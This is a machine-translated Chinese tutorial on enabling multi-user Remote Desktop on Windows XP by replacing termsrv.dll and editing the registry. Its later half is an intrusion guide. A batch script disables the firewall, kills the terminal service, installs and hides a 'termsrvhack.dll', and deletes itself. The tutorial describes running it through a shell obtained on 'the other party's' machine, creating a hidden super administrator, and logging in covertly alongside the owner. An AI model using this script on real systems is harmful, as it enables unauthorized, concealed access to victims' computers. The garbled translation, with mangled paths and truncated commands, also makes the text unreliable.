Windows XP 3389 (terminal) Multi-User Login

Step 1: first install the official SP2 version on Windows XP. Follow the conventional method to install it.

Step 2: Prepare an earlier version of SP2 Terminal Server software (it is said that this function has been disabled since build 2082, so it is best to use the previous version). It is difficult to find the Chinese SP2 test version, I used build 2055 in English version, and I did not find any problems after running it. You can from http://www.msfn.org/board/index.php? S = 85a71ca2987c89886c99733154ae685f & act = attach & type = Post & id = 161513 download the terminal server execution file termsrv. dll of build 2055. Download a file with the extension. DL _ from this link. You can change its extension to a zip file and then unbind it with WinRAR.

Step 3: Start Windows XP in safe mode. If there are multiple operating systems, you can start another system that can access Windows XP partition (unless a third-party tool software is installed, otherwise, Windows 98 cannot access the NTFS partition, so Windows 98 may be useless ). Back up all termsrv. DLL files of the official SP2 version in Windows XP and overwrite them with the termsrv. dll file of build 2055. Usually, termsrv. dll appears in at least two locations:/Windows/system32,/Windows/system32/dllcache. If termsrv. dll exists, use termsrv. dll of build 2055.

Step 4: Start Windows XP in normal mode. If the file protection function of the system prompts that the termsrv. dll file has been modified, ask if you want to restore it, and select No.

Step 5: Modify the Registry to add a multi-user license for the terminal server. You can use the following batch command to modify the registry:

@ Echo off
Setlocal
Set regkey = "HKLM/system/CurrentControlSet/control/Terminal Server/Licensing core"
Reg add % regkey %/V enableconcurrentsessions/T REG_DWORD/D 1/F
Endlocal

Save the preceding content as a batch of command files, such as AA. bat. Double-click and execute it.

I don't recommend this, it's too annoying, and it's also necessary to repeat the system. We can write a batch processing file so that the system can log on to multiple XP users without restarting. First, we will first learn about a command parameter for registry operations:

Reg add keyname [/V valuename |/ve] [/T type] [/s separator] [/D data] [/F]

Keyname [// machine/] fullkey
Machine Remote machine name-ignore default to current machine. Remote Machine
Only HKLM and HKU are supported.
Fullkey rootkey/subkey
Rootkey [HKLM | hkcu | hkcr | HKU | HKCC]
The complete name of the registry key under the rootkey selected by subkey.

The name of the value to be added under/v.

/Ve adds a blank value name for the Registry Key (default ).

/T regkey Data Type
[REG_SZ | reg_multi_sz | reg_expand_sz |
REG_DWORD | REG_BINARY | reg_none]
If this parameter is ignored, REG_SZ is used.

/S specifies a character used as a separator in the reg_multi_sz data string
If this parameter is ignored, "/0" is used as the separator.

/D the data to be allocated to the added registry valuename.

/F forcibly overwrite the existing registry key without prompting.

For example:

Reg add // ABC/HKLM/software/myco
Add a registry key HKLM/software/myco on the remote machine ABC

Reg add HKLM/software/myco/V Data/T REG_BINARY/d fe340ead
Add a value (Name: data, type: REG_BINARY, data: fe340ead)

Reg add HKLM/software/myco/v mru/T reg_multi_sz/d Fax/0 mail
Add a value (Name: MRU, type: reg_mutli_sz, data: Fax/0 mail/0/0)

Reg add HKLM/software/myco/V path/T reg_expand_sz/d ^ % systemroot ^ %
Add a value (Name: path, type: reg_expand_sz, data: % SystemRoot %)
Note: Use the insert symbol (^) in the extended string)

To prevent the system from being restarted, we can use the shutdown-a command.
Based on the information found above, we can write a batch process to achieve multi-user login to the XP system without restarting the system.
The Code is as follows:

@ Echo off
@ Net stop sharedaccess
@ Ntsd-C q-P "PID"
@ Reg add HKLM/software/Microsoft/Windows "" NT/CurrentVersion/Winlogon/V keeprasconnections/T REG_SZ/D 1/F
@ Reg add HKLM/system/CurrentControlSet/control/terminal "server/V fdenytsconnections/T REG_DWORD/d 00000000/F
@ Reg add HKLM/system/CurrentControlSet/control/terminal "" server/Licensing "" Core/V enableconcurrentsessions/T REG_DWORD/d 00000001/F
@ Reg add HKLM/system/CurrentControlSet/services/termservice/parameters/V servicedll/T reg_expand_sz/d % SystemRoot %/system32/termsrvhack. dll/F
@ Copy C:/termsrvhack. dll C:/Windows/system32/dllcache/termsrvhack. dll
@ Attrib + H + S + r c:/Windows/system32/dllcache/termsrvhack. dll
@ Copy C:/termsrvhack. dll C:/Windows/system32/termsrvhack. dll
@ Attrib + H + S + r c:/Windows/system32/termsrvhack. dll
@ Shutdown-
@ Del C:/termsrvhack. dll
@ Net start termservice
@ Del C:/3389.bat

"PID" is the PID Number of the termservice. You can use the tasklist/svc command to obtain the PID Number. Of course, there is no tasklist command in Win2000 and the following systems.
The specific operation method is
First, you need to get a shell from the other party, and then use a third-party software to open the terminal service under the shell. Do not change the default port 3389 first. Otherwise, you need to restart the terminal service before logging on, create or clone a super administrator user.
Next, upload the downloaded termsrvhack. dll and the above batch to the C root directory of the other party, and then run the batch in shell. Prompt successful!
Finally, open the login device and log on to the 3389 terminal!
After you log in, the operations in the computer and the operations on the computer's master do not affect each other. He plays with him, and you play with you. Haha, cool ?!

 

To sum up, follow these three steps:

Enable concurrent sessions
It consists of three steps:
1. Enable multi-user support (Registry Regedit)
2. Modify termsvr. dll
3. Change the user logon or logout mode: Use the welcome screen and use Quick User Switching